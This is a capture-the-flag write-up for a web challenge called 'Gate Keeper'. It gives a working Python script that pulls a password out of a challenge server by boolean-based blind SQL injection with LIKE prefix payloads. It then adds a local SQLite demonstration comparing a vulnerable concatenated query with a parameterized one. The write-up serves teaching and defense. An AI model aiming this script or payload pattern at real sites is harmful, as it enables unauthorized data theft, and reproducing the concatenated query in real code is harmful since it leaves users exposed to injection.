# Gate Keeper

Author: [roerohan](https://github.com/roerohan)

## Exploit

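Boolean-based blind SQL injection: the form field is injected with a `LIKE`
prefix test, and the success text in the response shows whether the guessed
prefix is correct, so the value is recovered one character at a time. This
also works for the [Taxi Union](../taxi%20union) challenge.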

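```py
import requests
import string

flag = ''

# Characters tried at each position. LIKE treats `_` as a single-character
# wildcard, so a `_` in the result can stand for any character not listed before it.
domain = string.ascii_lowercase + string.ascii_uppercase + string.digits + '_}'

# Per-challenge settings: target URL, text that marks a successful guess,
# form field to inject into, and the column being read.
challenge = "gate keeper"
url = ""
check = ""
key = ""
column = ""
if challenge == "taxi union":
    url = 'http://extremely.uniquename.xyz:2052/'
    check = "TN-06-AP-9879"
    key = 'lisence_plate'
    column = "location"
elif challenge == 'gate keeper':
    url = 'http://extremely.uniquename.xyz:2082/'
    check = "The flag for the CTF is the password you entered.(If you havent cheated that is)"
    key = 'password'
    column = "password"

print("URL", url)

while True:
    for char in domain:
        # Ask whether the column starts with the known prefix plus this character.
        payload = "' or {} like '{}%'; --".format(column, flag + char)
        print(payload)

        r = requests.post(url, data={key: payload})

        if check in r.text:
            flag = flag + char
            print("Success " + flag)
            break
    else:
        # No character extended the prefix: the value is complete.
        break

print(flag)
```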
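Why the payload gives a yes/no answer and what removes it, as an added example that is not part of the original writeup. The challenge's server code is not shown on this page, so the `gate` table, the string-built query and the stored value below are assumptions, constructed with an in-memory SQLite database.

```python
import sqlite3

# Constructed sample value; the real challenge data is not shown in the writeup.
SECRET = "flag{constructed_value}"


def make_db():
    # Hypothetical one-column table standing in for the challenge's storage.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE gate (password TEXT)")
    db.execute("INSERT INTO gate VALUES (?)", (SECRET,))
    return db


def login_concat(db, password):
    # Assumed vulnerable pattern: input is spliced into the SQL text, so a
    # quote in the input ends the string literal and the rest is parsed as SQL.
    query = "SELECT 1 FROM gate WHERE password = '" + password + "'"
    return db.execute(query).fetchone() is not None


def login_param(db, password):
    # Hardened form: the input is bound as a value and never parsed as SQL.
    query = "SELECT 1 FROM gate WHERE password = ?"
    return db.execute(query, (password,)).fetchone() is not None


def payload(prefix):
    # Same payload shape as the script above, with column = "password".
    return "' or {} like '{}%'; --".format("password", prefix)


def compare(prefixes):
    # For each prefix: (prefix, result with concatenation, result with binding).
    db = make_db()
    return [(p, login_concat(db, payload(p)), login_param(db, payload(p)))
            for p in prefixes]


if __name__ == "__main__":
    for prefix, concat_ok, param_ok in compare(["f", "x", "fl", "fx"]):
        print(f"prefix={prefix!r:5} concatenated={concat_ok!s:5} "
              f"parameterized={param_ok}")
```

Only the concatenated query answers differently for a right and a wrong prefix; that difference is the signal the script reads through its `check` string. With a bound parameter the whole payload is compared as a literal password and never matches.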

Original writeup (https://github.com/csivitu/CTF-Write-ups/tree/master/Deconstruct.f/web/gate%20keeper).